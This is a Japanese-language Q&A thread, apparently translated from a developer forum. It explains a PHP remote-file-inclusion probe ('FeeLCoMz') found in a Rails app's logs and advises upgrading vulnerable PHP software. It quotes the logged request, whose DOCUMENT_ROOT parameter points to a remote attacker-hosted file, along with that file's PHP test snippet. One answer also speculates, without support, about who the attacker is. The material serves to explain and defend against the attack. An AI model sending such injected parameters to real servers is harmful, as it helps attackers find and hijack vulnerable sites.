韓国のサイトからの奇妙なリクエスト
最近、私はこのような奇妙なリクエストが私のRails app:
Processing ApplicationController#index (for 189.30.242.61 at 2009-12-14 07:38:24) [GET]
Parameters: {"_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???"}}
ActionController::RoutingError (No route matches "/browse/brand/nike ///" with {:method=>:get}):
それらをたくさん取得し、送信しようとしている奇妙なパラメータに気付いたので、自動化されているようです。
_SERVER"=>{"DOCUMENT_ROOT"=>"http://www.usher.co.kr/bbs/id1.txt???
これは悪意のあるものですか?もしそうなら、私はそれについて何をすべきですか?
参照されているドキュメントを韓国のサーバーで開くと(おそらく持ってはいけませんが、持っていました;)、次のように表示されます。
<?php /* Fx29ID */ echo("FeeL"."CoMz"); die("FeeL"."CoMz"); /* Fx29ID */ ?>
'ネットで検索すると、これはJoomla、Wordpress、Firestatsのいずれかのエクスプロイトのようです(サイトが異なれば、ターゲットも異なります)。これらのいずれかを実行している場合は、必ず最新バージョンにアップグレードしてください。
詳細はこちら: http://urbanoalvarez.es/blog/2009/09/24/feelcomz-rfi/ およびこちら: http://tech.sweetnam.eu/2009/ 06/firestats-wordpress-exploit /
これはエクスプロイトではありません。$_SERVER['DOCUMENT_ROOT'] PHP変数の置き換えを可能にする脆弱なサーバーを見つけようとするだけです。
これは次のように機能します。サーバーが脆弱な場合、「FeeLCoMz」がページに出力されます。リクエストを送信したスクリプトによって検出され、サイトはサーバーのデータベースに追加されます。サーバーのデータベースは間もなくボットネットのメンバーになります:)
上に貼り付けたSeanEarpのコードは、システムが脆弱かどうかを確認するためのテストコードにすぎません。次に、システムが脆弱な場合、主な攻撃が発生します。システムは攻撃者の制御下にあります。攻撃者はあなたのシステムを彼の友人のためのIRCサーバーにし、あなたのすべてのファイルを他の人と共有します。またはあなたのシステムを他のIP番号への攻撃の犠牲者として使用します。パスワードを削除したり、クライアントデータを偽装したりします。 リモートコードインジェクション攻撃の解剖学と分析 に記事があります。実際の攻撃コードの例がいくつか示されています。
私はまた、FeelComzが誰であるかを見つけるために一定期間追跡しました。私が見つけたのは、ircサイトで昼夜を問わず遊んでいる貧しいインドネシアの子供です。彼はFriendsterという名前のインドネシアのサイトに個人ページを持っています。彼は津波の後であなたが彼の国にした援助に感謝しているようです。